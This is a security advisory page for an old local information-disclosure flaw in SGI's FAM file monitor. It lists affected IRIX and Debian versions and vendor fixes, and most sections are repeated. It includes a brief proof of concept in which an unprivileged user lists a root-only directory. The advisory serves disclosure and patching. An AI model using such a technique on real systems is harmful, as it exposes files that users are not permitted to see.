SGI FAM Arbitrary Root Owned Directory File Listing Vulnerability
BID:5487
Info
SGI FAM Arbitrary Root Owned Directory File Listing Vulnerability
| Bugtraq ID: | 5487 |
| Class: | Design Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Aug 16 2002 12:00AM |
| Updated: | Aug 16 2002 12:00AM |
| Credit: | Vulnerability discovery credited to Michael Wardle <[email protected]>. |
| Vulnerable: |
SGI IRIX 6.5.10 m SGI IRIX 6.5.10 f SGI IRIX 6.5.10 SGI IRIX 6.5.9 m SGI IRIX 6.5.9 f SGI IRIX 6.5.9 SGI IRIX 6.5.8 m SGI IRIX 6.5.8 f SGI IRIX 6.5.8 SGI IRIX 6.5.7 m SGI IRIX 6.5.7 f SGI IRIX 6.5.7 SGI IRIX 6.5.6 m SGI IRIX 6.5.6 f SGI IRIX 6.5.6 SGI IRIX 6.5.5 m SGI IRIX 6.5.5 f SGI IRIX 6.5.5 SGI IRIX 6.5.4 m SGI IRIX 6.5.4 f SGI IRIX 6.5.4 SGI IRIX 6.5.3 m SGI IRIX 6.5.3 f SGI IRIX 6.5.3 SGI IRIX 6.5.2 m SGI IRIX 6.5.2 f SGI IRIX 6.5.2 SGI IRIX 6.5.1 SGI IRIX 6.5 Debian Linux 3.0 |
| Not Vulnerable: |
SGI IRIX 6.5.18 m SGI IRIX 6.5.18 f SGI IRIX 6.5.18 SGI IRIX 6.5.17 m SGI IRIX 6.5.17 f SGI IRIX 6.5.17 SGI IRIX 6.5.16 m SGI IRIX 6.5.16 f SGI IRIX 6.5.16 SGI IRIX 6.5.15 m SGI IRIX 6.5.15 f SGI IRIX 6.5.15 SGI IRIX 6.5.14 m SGI IRIX 6.5.14 f SGI IRIX 6.5.14 SGI IRIX 6.5.13 m SGI IRIX 6.5.13 f SGI IRIX 6.5.13 SGI IRIX 6.5.12 m SGI IRIX 6.5.12 f SGI IRIX 6.5.12 SGI IRIX 6.5.11 m SGI IRIX 6.5.11 f SGI IRIX 6.5.11 |
Discussion
SGI FAM Arbitrary Root Owned Directory File Listing Vulnerability
fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems.
It is possible for a user to execute fam to discover a list of monitored files. This list, while it may have been created by a user of elevated privileges, could leak information to an attacker that may be sensitive. This vulnerability requires only that the directory being 'fammed' already have had the program executed against it by a privileged user.
fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems.
It is possible for a user to execute fam to discover a list of monitored files. This list, while it may have been created by a user of elevated privileges, could leak information to an attacker that may be sensitive. This vulnerability requires only that the directory being 'fammed' already have had the program executed against it by a privileged user.
Exploit / POC
SGI FAM Arbitrary Root Owned Directory File Listing Vulnerability
This example was provided by Michael Wardle:
# ls -ld /root
drwxr-x--- ... root root ... /root
# fam
% groups | grep root
ERRONEOUS BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: .gnome Exists
DIR /root: Desktop Exists
...
CORRECT BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: /root EndExist
----------------------------------------
(% indicates a command run as an unprivileged user)
This example was provided by Michael Wardle:
# ls -ld /root
drwxr-x--- ... root root ... /root
# fam
% groups | grep root
ERRONEOUS BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: .gnome Exists
DIR /root: Desktop Exists
...
CORRECT BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: /root EndExist
----------------------------------------
(% indicates a command run as an unprivileged user)
Solution / Fix
SGI FAM Arbitrary Root Owned Directory File Listing Vulnerability
Solution:
FreeBSD has released a Security Notice FreeBSD-SN-02:05. Users of FreeBSD systems are strongly urged to upgrade their ports tree to fix various reported issues. Further information can be found in the referenced Security Notice.
SGI has released an advisory. Users are advised to upgrade their systems to IRIX 6.5.11 or later.
Red Hat has released advisory RHSA-2005:005-04 to address this issue in FAM for Red Hat Enterprise Linux. Please see the advisory in Web references for more information.
Fixes available:
Debian Linux 3.0
Solution:
FreeBSD has released a Security Notice FreeBSD-SN-02:05. Users of FreeBSD systems are strongly urged to upgrade their ports tree to fix various reported issues. Further information can be found in the referenced Security Notice.
SGI has released an advisory. Users are advised to upgrade their systems to IRIX 6.5.11 or later.
Red Hat has released advisory RHSA-2005:005-04 to address this issue in FAM for Red Hat Enterprise Linux. Please see the advisory in Web references for more information.
Fixes available:
Debian Linux 3.0
-
Debian fam_2.6.6.1-5.2_alpha.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_alp ha.deb -
Debian fam_2.6.6.1-5.2_arm.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_arm .deb -
Debian fam_2.6.6.1-5.2_hppa.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_hpp a.deb -
Debian fam_2.6.6.1-5.2_i386.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_i38 6.deb -
Debian fam_2.6.6.1-5.2_ia64.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_ia6 4.deb -
Debian fam_2.6.6.1-5.2_m68k.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_m68 k.deb -
Debian fam_2.6.6.1-5.2_mips.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_mip s.deb -
Debian fam_2.6.6.1-5.2_mipsel.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_mip sel.deb -
Debian fam_2.6.6.1-5.2_powerpc.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_pow erpc.deb -
Debian fam_2.6.6.1-5.2_s390.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_s39 0.deb -
Debian fam_2.6.6.1-5.2_sparc.deb
http://security.debian.org/pool/updates/main/f/fam/fam_2.6.6.1-5.2_spa rc.deb -
Debian libfam-dev_2.6.6.1-5.2_alpha.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_alpha.deb -
Debian libfam-dev_2.6.6.1-5.2_arm.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_arm.deb -
Debian libfam-dev_2.6.6.1-5.2_hppa.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_hppa.deb -
Debian libfam-dev_2.6.6.1-5.2_i386.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_i386.deb -
Debian libfam-dev_2.6.6.1-5.2_ia64.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_ia64.deb -
Debian libfam-dev_2.6.6.1-5.2_m68k.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_m68k.deb -
Debian libfam-dev_2.6.6.1-5.2_mips.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_mips.deb -
Debian libfam-dev_2.6.6.1-5.2_mipsel.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_mipsel.deb -
Debian libfam-dev_2.6.6.1-5.2_powerpc.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_powerpc.deb -
Debian libfam-dev_2.6.6.1-5.2_s390.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_s390.deb -
Debian libfam-dev_2.6.6.1-5.2_sparc.deb
http://security.debian.org/pool/updates/main/f/fam/libfam-dev_2.6.6.1- 5.2_sparc.deb -
Debian libfam0_2.6.6.1-5.2_alpha.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _alpha.deb -
Debian libfam0_2.6.6.1-5.2_arm.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _arm.deb -
Debian libfam0_2.6.6.1-5.2_hppa.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _hppa.deb -
Debian libfam0_2.6.6.1-5.2_i386.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _i386.deb -
Debian libfam0_2.6.6.1-5.2_ia64.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _ia64.deb -
Debian libfam0_2.6.6.1-5.2_m68k.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _m68k.deb -
Debian libfam0_2.6.6.1-5.2_mips.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _mips.deb -
Debian libfam0_2.6.6.1-5.2_mipsel.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _mipsel.deb -
Debian libfam0_2.6.6.1-5.2_powerpc.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _powerpc.deb -
Debian libfam0_2.6.6.1-5.2_s390.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _s390.deb -
Debian libfam0_2.6.6.1-5.2_sparc.deb
http://security.debian.org/pool/updates/main/f/fam/libfam0_2.6.6.1-5.2 _sparc.deb
References
SGI FAM Arbitrary Root Owned Directory File Listing Vulnerability
References:
References:
- Bug 151 (SGI)
- Debian Bug report logs - #148853 (Debian)
- RHSA-2005:005-04 - Updated fam packages fix security issue (RedHat)